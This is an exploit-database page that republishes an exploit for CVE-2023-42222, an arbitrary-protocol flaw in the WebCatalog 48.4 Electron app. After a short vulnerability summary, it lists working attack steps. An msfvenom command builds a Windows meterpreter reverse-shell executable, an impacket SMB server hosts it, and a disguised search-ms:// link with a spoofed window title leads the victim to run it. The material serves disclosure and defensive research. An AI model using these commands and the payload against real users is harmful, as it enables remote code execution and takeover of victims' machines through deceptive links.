Advertisement






WebCatalog 48.4 Arbitrary Protocol Execution / Code Execution

CVE Category Price Severity
CVE-2023-42222 CWE-118 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2024-02-02
CVSS
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020012

Below is a copy:

WebCatalog 48.4 Arbitrary Protocol Execution / Code Execution
# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution
# Date: 9/27/2023
# Exploit Author: ItsSixtyN3in
# Vendor Homepage: https://webcatalog.io/en/
# Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe
# Version: 48.4.0
# Tested on: Windows
# CVE : CVE-2023-42222

Vulnerability summary:
WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.

Exploit details:

-   Create a reverse shell file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe



-   Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py)

python3 smbserver.py Tools -smb2support



-   Have the user sync a page with the payload as a renamed link

[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title)



Payload:
search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title

Tobias Diehl
Security Consultant
OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300
Pronouns: he/him
e-mail:  [email protected]

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.